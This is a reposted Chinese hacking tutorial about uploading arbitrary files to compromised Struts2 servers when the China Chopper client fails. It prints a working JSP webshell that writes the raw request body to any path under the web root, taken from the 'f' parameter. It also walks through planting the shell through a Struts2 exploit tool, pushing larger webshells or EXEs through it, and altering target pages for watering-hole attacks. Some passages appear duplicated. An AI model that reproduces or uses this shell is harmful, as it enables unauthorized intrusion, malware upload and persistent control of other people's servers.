[原創]Struts2奇葩環境任意文件上傳工具(解決菜刀無法傳文件或上傳亂碼等問題)
阿新 • • 發佈:2019-01-13
alt tput output req div 菜刀 struts2 () null 
第二份 Hex因年前碰到一個環境 13年的竟然不兼容 因工作需要又弄了一份
第一步 使用k8最新s2工具 通過漏洞上傳小馬2
0x002 連接小馬 填寫對應URL,填寫輸出文件名 點擊任意文件上傳即可
上面這問題問得好
1 不知道大家有沒碰到有些Strus2站點 上傳JSP後訪問404 或者503
註意我說的是404或503不是403(要是403換個css/img等目錄或許可以)
但對於明明在web目錄下放了jsp訪問卻404,怎麽辦?上exe 弄它啊 怎麽辦
2 估計大部分人碰到的是可以上傳小馬無法上傳大馬 怎麽辦?
3 碰到可上傳菜刀馬,但無法通過菜刀上傳任何文件怎麽辦?
4 比如通過菜刀傳別的馬進去JSP代碼被截斷了怎麽辦?
5 或者說目標站點頁面是XX語言,實施水坑,修改代碼保存亂碼 怎麽辦?
第一份 byte
<%@page
import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream
os=new
FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream
is=request.getInputStream();byte[] b=new byte[512];int
n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%>
0x001 對應連接工具為13年作品 (工具大家自己找)
第二份 Hex因年前碰到一個環境 13年的竟然不兼容 因工作需要又弄了一份
第一步 使用k8最新s2工具 通過漏洞上傳小馬2
0x002 連接小馬 填寫對應URL,填寫輸出文件名 點擊任意文件上傳即可
0x003 隨便找的一個URL測試(應用用win系統才對),不過上傳EXE 再下載回本地(測試能用沒損壞也是一樣)
[原創]Struts2奇葩環境任意文件上傳工具(解決菜刀無法傳文件或上傳亂碼等問題)